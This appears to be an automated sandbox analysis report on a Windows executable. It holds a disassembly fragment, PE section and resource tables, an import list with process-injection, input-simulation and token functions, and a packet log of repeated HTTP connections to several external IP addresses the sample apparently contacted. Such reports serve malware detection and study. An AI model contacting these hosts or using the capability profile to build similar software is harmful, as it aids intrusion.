mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F46D09E399Ah
cmp edi, eax
jc 00007F46D09E3CFEh
bt dword ptr [004C41FCh], 01h
jnc 00007F46D09E3999h
rep movsb
jmp 00007F46D09E3CACh
cmp ecx, 00000080h
jc 00007F46D09E3B64h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F46D09E39A0h
bt dword ptr [004BF324h], 01h
jc 00007F46D09E3E70h
bt dword ptr [004C41FCh], 00000000h
jnc 00007F46D09E3B3Dh
test edi, 00000003h
jne 00007F46D09E3B4Eh
test esi, 00000003h
jne 00007F46D09E3B2Dh
bt edi, 02h
jnc 00007F46D09E399Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F46D09E39A3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F46D09E39F5h
bt esi, 03h
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD5 build 40629
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD5 build 40629
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xbc0cc          0x17c         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc8000          0x513b8       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x11a000         0x7134        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x92bc0          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xa4b50          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8f000          0x884         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
.text   0x1000           0x8dfdd       0x8e000   310e36668512d53489c005622bb1b4a9  False     0.5735602580325704   data       6.675248351711057   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x8f000          0x2fd8e       0x2fe00   748cf1ab2605ce1fd72d53d912abb68f  False     0.32828818537859006  data       5.763244005758284   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xbf000          0x8f74        0x5200    aae9601d920f07080bdfadf43dfeff12  False     0.1017530487804878   data       1.1963819235530628  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0xc8000          0x513b8       0x51400   cab5db91ce3130a1c19cd210f4a30c97  False     0.9195492788461539   data       7.874266521852538   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x11a000         0x7134        0x7200    f04128ad0f87f42830e4a6cdbc38c719  False     0.7617530153508771   data       6.783955557128661   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA       Size     Type                                                                                  Language  Country        ZLIB Complexity
RT_ICON        0xc85a8   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 192                        English   Great Britain  0.7466216216216216
RT_ICON        0xc86d0   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors   English   Great Britain  0.3277027027027027
RT_ICON        0xc87f8   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 192                        English   Great Britain  0.3885135135135135
RT_ICON        0xc8920   0x2e8    Device independent bitmap graphic, 32 x 64 x 4, image size 0                          English   Great Britain  0.3333333333333333
RT_ICON        0xc8c08   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 0                          English   Great Britain  0.5
RT_ICON        0xc8d30   0xea8    Device independent bitmap graphic, 48 x 96 x 8, image size 0                          English   Great Britain  0.2835820895522388
RT_ICON        0xc9bd8   0x8a8    Device independent bitmap graphic, 32 x 64 x 8, image size 0                          English   Great Britain  0.37906137184115524
RT_ICON        0xca480   0x568    Device independent bitmap graphic, 16 x 32 x 8, image size 0                          English   Great Britain  0.23699421965317918
RT_ICON        0xca9e8   0x25a8   Device independent bitmap graphic, 48 x 96 x 32, image size 0                         English   Great Britain  0.13858921161825727
RT_ICON        0xccf90   0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 0                         English   Great Britain  0.25070356472795496
RT_ICON        0xce038   0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 0                         English   Great Britain  0.3173758865248227
RT_MENU        0xce4a0   0x50     data                                                                                  English   Great Britain  0.9
RT_STRING      0xce4f0   0x594    data                                                                                  English   Great Britain  0.3333333333333333
RT_STRING      0xcea84   0x68a    data                                                                                  English   Great Britain  0.2747909199522103
RT_STRING      0xcf110   0x490    data                                                                                  English   Great Britain  0.3715753424657534
RT_STRING      0xcf5a0   0x5fc    data                                                                                  English   Great Britain  0.3087467362924282
RT_STRING      0xcfb9c   0x65c    data                                                                                  English   Great Britain  0.34336609336609336
RT_STRING      0xd01f8   0x466    data                                                                                  English   Great Britain  0.3605683836589698
RT_STRING      0xd0660   0x158    Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0                      English   Great Britain  0.502906976744186
RT_RCDATA      0xd07b8   0x48650  data                                                                                                           1.0003406086440403
RT_GROUP_ICON  0x118e08  0x76     data                                                                                  English   Great Britain  0.6610169491525424
RT_GROUP_ICON  0x118e80  0x14     data                                                                                  English   Great Britain  1.25
RT_GROUP_ICON  0x118e94  0x14     data                                                                                  English   Great Britain  1.15
RT_GROUP_ICON  0x118ea8  0x14     data                                                                                  English   Great Britain  1.25
RT_VERSION     0x118ebc  0x10c    data                                                                                  English   Great Britain  0.5970149253731343
RT_MANIFEST    0x118fc8  0x3ef    ASCII text, with CRLF line terminators                                                English   Great Britain  0.5074478649453823
DLL: Import
WSOCK32.dll: WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll: GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll: timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll: ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll: WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll: InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL: GetProcessMemoryInfo
IPHLPAPI.DLL: IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll: DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll: IsThemeActive
KERNEL32.dll: DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll: AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll: StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll: GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll: GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll: DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll: LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system  Country where language is spoken
English                         Great Britain
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Jun 9, 2024 17:59:49.452542067 CEST  49711        80         192.168.2.11    154.215.72.110
Jun 9, 2024 17:59:49.457829952 CEST  80           49711      154.215.72.110  192.168.2.11
Jun 9, 2024 17:59:49.457956076 CEST  49711        80         192.168.2.11    154.215.72.110
Jun 9, 2024 17:59:49.461067915 CEST  49711        80         192.168.2.11    154.215.72.110
Jun 9, 2024 17:59:49.465974092 CEST  80           49711      154.215.72.110  192.168.2.11
Jun 9, 2024 17:59:50.418404102 CEST  80           49711      154.215.72.110  192.168.2.11
Jun 9, 2024 17:59:50.460371971 CEST  49711        80         192.168.2.11    154.215.72.110
Jun 9, 2024 17:59:50.600673914 CEST  80           49711      154.215.72.110  192.168.2.11
Jun 9, 2024 17:59:50.600982904 CEST  49711        80         192.168.2.11    154.215.72.110
Jun 9, 2024 17:59:50.602484941 CEST  49711        80         192.168.2.11    154.215.72.110
Jun 9, 2024 17:59:50.607391119 CEST  80           49711      154.215.72.110  192.168.2.11
Jun 9, 2024 18:00:06.185020924 CEST  49712        80         192.168.2.11    202.172.28.202
Jun 9, 2024 18:00:06.189982891 CEST  80           49712      202.172.28.202  192.168.2.11
Jun 9, 2024 18:00:06.190092087 CEST  49712        80         192.168.2.11    202.172.28.202
Jun 9, 2024 18:00:06.192022085 CEST  49712        80         192.168.2.11    202.172.28.202
Jun 9, 2024 18:00:06.196938038 CEST  80           49712      202.172.28.202  192.168.2.11
Jun 9, 2024 18:00:07.068464994 CEST  80           49712      202.172.28.202  192.168.2.11
Jun 9, 2024 18:00:07.116796970 CEST  49712        80         192.168.2.11    202.172.28.202
Jun 9, 2024 18:00:07.694972992 CEST  49712        80         192.168.2.11    202.172.28.202
Jun 9, 2024 18:00:08.725439072 CEST  49713        80         192.168.2.11    202.172.28.202
Jun 9, 2024 18:00:08.730669975 CEST  80           49713      202.172.28.202  192.168.2.11
Jun 9, 2024 18:00:08.730776072 CEST  49713        80         192.168.2.11    202.172.28.202
Jun 9, 2024 18:00:08.733159065 CEST  49713        80         192.168.2.11    202.172.28.202
Jun 9, 2024 18:00:08.738149881 CEST  80           49713      202.172.28.202  192.168.2.11
Jun 9, 2024 18:00:09.618321896 CEST  80           49713      202.172.28.202  192.168.2.11
Jun 9, 2024 18:00:09.663511992 CEST  49713        80         192.168.2.11    202.172.28.202
Jun 9, 2024 18:00:10.241836071 CEST  49713        80         192.168.2.11    202.172.28.202
Jun 9, 2024 18:00:11.261452913 CEST  49714        80         192.168.2.11    202.172.28.202
Jun 9, 2024 18:00:11.266510010 CEST  80           49714      202.172.28.202  192.168.2.11
Jun 9, 2024 18:00:11.266897917 CEST  49714        80         192.168.2.11    202.172.28.202
Jun 9, 2024 18:00:11.269473076 CEST  49714        80         192.168.2.11    202.172.28.202
Jun 9, 2024 18:00:11.274425983 CEST  80           49714      202.172.28.202  192.168.2.11
Jun 9, 2024 18:00:11.274543047 CEST  80           49714      202.172.28.202  192.168.2.11
Jun 9, 2024 18:00:12.141779900 CEST  80           49714      202.172.28.202  192.168.2.11
Jun 9, 2024 18:00:12.194782972 CEST  49714        80         192.168.2.11    202.172.28.202
Jun 9, 2024 18:00:12.772931099 CEST  49714        80         192.168.2.11    202.172.28.202
Jun 9, 2024 18:00:13.792754889 CEST  49715        80         192.168.2.11    202.172.28.202
Jun 9, 2024 18:00:13.797868013 CEST  80           49715      202.172.28.202  192.168.2.11
Jun 9, 2024 18:00:13.798013926 CEST  49715        80         192.168.2.11    202.172.28.202
Jun 9, 2024 18:00:13.800039053 CEST  49715        80         192.168.2.11    202.172.28.202
Jun 9, 2024 18:00:13.805027008 CEST  80           49715      202.172.28.202  192.168.2.11
Jun 9, 2024 18:00:14.673310995 CEST  80           49715      202.172.28.202  192.168.2.11
Jun 9, 2024 18:00:14.726035118 CEST  49715        80         192.168.2.11    202.172.28.202
Jun 9, 2024 18:00:15.533484936 CEST  80           49715      202.172.28.202  192.168.2.11
Jun 9, 2024 18:00:15.533678055 CEST  49715        80         192.168.2.11    202.172.28.202
Jun 9, 2024 18:00:15.534800053 CEST  49715        80         192.168.2.11    202.172.28.202
Jun 9, 2024 18:00:15.539680958 CEST  80           49715      202.172.28.202  192.168.2.11
Jun 9, 2024 18:00:20.964354992 CEST  49717        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:20.969410896 CEST  80           49717      116.50.37.244   192.168.2.11
Jun 9, 2024 18:00:20.971623898 CEST  49717        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:21.000495911 CEST  49717        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:21.005455971 CEST  80           49717      116.50.37.244   192.168.2.11
Jun 9, 2024 18:00:22.126542091 CEST  80           49717      116.50.37.244   192.168.2.11
Jun 9, 2024 18:00:22.179117918 CEST  49717        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:22.400542974 CEST  80           49717      116.50.37.244   192.168.2.11
Jun 9, 2024 18:00:22.400669098 CEST  49717        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:22.523005962 CEST  49717        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:23.541934013 CEST  49718        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:23.547039032 CEST  80           49718      116.50.37.244   192.168.2.11
Jun 9, 2024 18:00:23.547143936 CEST  49718        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:23.549029112 CEST  49718        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:23.554017067 CEST  80           49718      116.50.37.244   192.168.2.11
Jun 9, 2024 18:00:24.699737072 CEST  80           49718      116.50.37.244   192.168.2.11
Jun 9, 2024 18:00:24.741627932 CEST  49718        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:24.970832109 CEST  80           49718      116.50.37.244   192.168.2.11
Jun 9, 2024 18:00:24.971129894 CEST  49718        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:25.054635048 CEST  49718        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:26.073272943 CEST  49719        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:26.078495026 CEST  80           49719      116.50.37.244   192.168.2.11
Jun 9, 2024 18:00:26.078676939 CEST  49719        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:26.081218958 CEST  49719        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:26.086246014 CEST  80           49719      116.50.37.244   192.168.2.11
Jun 9, 2024 18:00:26.086263895 CEST  80           49719      116.50.37.244   192.168.2.11
Jun 9, 2024 18:00:27.208110094 CEST  80           49719      116.50.37.244   192.168.2.11
Jun 9, 2024 18:00:27.257299900 CEST  49719        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:27.469496012 CEST  80           49719      116.50.37.244   192.168.2.11
Jun 9, 2024 18:00:27.469731092 CEST  49719        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:27.588196993 CEST  49719        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:28.604321003 CEST  49720        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:28.609299898 CEST  80           49720      116.50.37.244   192.168.2.11
Jun 9, 2024 18:00:28.609632969 CEST  49720        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:28.611443996 CEST  49720        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:28.616588116 CEST  80           49720      116.50.37.244   192.168.2.11
Jun 9, 2024 18:00:29.777225018 CEST  80           49720      116.50.37.244   192.168.2.11
Jun 9, 2024 18:00:29.819843054 CEST  49720        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:30.057840109 CEST  80           49720      116.50.37.244   192.168.2.11
Jun 9, 2024 18:00:30.058135986 CEST  49720        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:30.059566975 CEST  49720        80         192.168.2.11    116.50.37.244
Jun 9, 2024 18:00:30.064531088 CEST  80           49720      116.50.37.244   192.168.2.11
Jun 9, 2024 18:00:35.102945089 CEST  49721        80         192.168.2.11    46.30.213.191
Jun 9, 2024 18:00:35.107918978 CEST  80           49721      46.30.213.191   192.168.2.11
Jun 9, 2024 18:00:35.108057022 CEST  49721        80         192.168.2.11    46.30.213.191
Jun 9, 2024 18:00:35.109940052 CEST  49721        80         192.168.2.11    46.30.213.191
                                                    Jun 9, 2024 18:00:35.114797115 CEST804972146.30.213.191192.168.2.11
                                                    Jun 9, 2024 18:00:35.940392017 CEST804972146.30.213.191192.168.2.11
                                                    Jun 9, 2024 18:00:35.991641998 CEST4972180192.168.2.1146.30.213.191
                                                    Jun 9, 2024 18:00:36.052808046 CEST804972146.30.213.191192.168.2.11
                                                    Jun 9, 2024 18:00:36.052922010 CEST4972180192.168.2.1146.30.213.191
                                                    Jun 9, 2024 18:00:36.616837978 CEST4972180192.168.2.1146.30.213.191
                                                    Jun 9, 2024 18:00:37.635236025 CEST4972280192.168.2.1146.30.213.191
                                                    Jun 9, 2024 18:00:37.640513897 CEST804972246.30.213.191192.168.2.11
                                                    Jun 9, 2024 18:00:37.640613079 CEST4972280192.168.2.1146.30.213.191
                                                    Jun 9, 2024 18:00:37.642338037 CEST4972280192.168.2.1146.30.213.191
                                                    Jun 9, 2024 18:00:37.647208929 CEST804972246.30.213.191192.168.2.11
                                                    Jun 9, 2024 18:00:38.475478888 CEST804972246.30.213.191192.168.2.11
                                                    Jun 9, 2024 18:00:38.522943020 CEST4972280192.168.2.1146.30.213.191
                                                    Jun 9, 2024 18:00:38.587946892 CEST804972246.30.213.191192.168.2.11
                                                    Jun 9, 2024 18:00:38.588067055 CEST4972280192.168.2.1146.30.213.191
                                                    Jun 9, 2024 18:00:39.148360014 CEST4972280192.168.2.1146.30.213.191
                                                    Jun 9, 2024 18:00:40.166760921 CEST4972380192.168.2.1146.30.213.191
                                                    Jun 9, 2024 18:00:40.171827078 CEST804972346.30.213.191192.168.2.11
                                                    Jun 9, 2024 18:00:40.171935081 CEST4972380192.168.2.1146.30.213.191
                                                    Jun 9, 2024 18:00:40.173988104 CEST4972380192.168.2.1146.30.213.191
                                                    Jun 9, 2024 18:00:40.178896904 CEST804972346.30.213.191192.168.2.11
                                                    Jun 9, 2024 18:00:40.179425001 CEST804972346.30.213.191192.168.2.11
                                                    Jun 9, 2024 18:00:41.002940893 CEST804972346.30.213.191192.168.2.11
                                                    Jun 9, 2024 18:00:41.054141998 CEST4972380192.168.2.1146.30.213.191
                                                    Jun 9, 2024 18:00:41.114856958 CEST804972346.30.213.191192.168.2.11
                                                    Jun 9, 2024 18:00:41.114949942 CEST4972380192.168.2.1146.30.213.191
                                                    Jun 9, 2024 18:00:41.681355000 CEST4972380192.168.2.1146.30.213.191
                                                    Jun 9, 2024 18:00:42.702465057 CEST4972480192.168.2.1146.30.213.191
                                                    Jun 9, 2024 18:00:42.707746029 CEST804972446.30.213.191192.168.2.11
                                                    Jun 9, 2024 18:00:42.707853079 CEST4972480192.168.2.1146.30.213.191
                                                    Jun 9, 2024 18:00:42.712661982 CEST4972480192.168.2.1146.30.213.191
                                                    Jun 9, 2024 18:00:42.717693090 CEST804972446.30.213.191192.168.2.11
                                                    Jun 9, 2024 18:00:43.538681984 CEST804972446.30.213.191192.168.2.11
                                                    Jun 9, 2024 18:00:43.585453987 CEST4972480192.168.2.1146.30.213.191
                                                    Jun 9, 2024 18:00:43.845674992 CEST804972446.30.213.191192.168.2.11
                                                    Jun 9, 2024 18:00:43.845849991 CEST4972480192.168.2.1146.30.213.191
                                                    Jun 9, 2024 18:00:43.846756935 CEST4972480192.168.2.1146.30.213.191
                                                    Jun 9, 2024 18:00:43.853535891 CEST804972446.30.213.191192.168.2.11
                                                    Jun 9, 2024 18:00:48.963541985 CEST4972580192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:48.968491077 CEST804972585.159.66.93192.168.2.11
                                                    Jun 9, 2024 18:00:48.968560934 CEST4972580192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:48.973733902 CEST4972580192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:48.978621006 CEST804972585.159.66.93192.168.2.11
                                                    Jun 9, 2024 18:00:49.939908028 CEST804972585.159.66.93192.168.2.11
                                                    Jun 9, 2024 18:00:49.993588924 CEST4972580192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:50.101119041 CEST804972585.159.66.93192.168.2.11
                                                    Jun 9, 2024 18:00:50.101646900 CEST4972580192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:50.476161003 CEST4972580192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:51.494760990 CEST4972680192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:51.499953032 CEST804972685.159.66.93192.168.2.11
                                                    Jun 9, 2024 18:00:51.500183105 CEST4972680192.168.2.1185.159.66.93
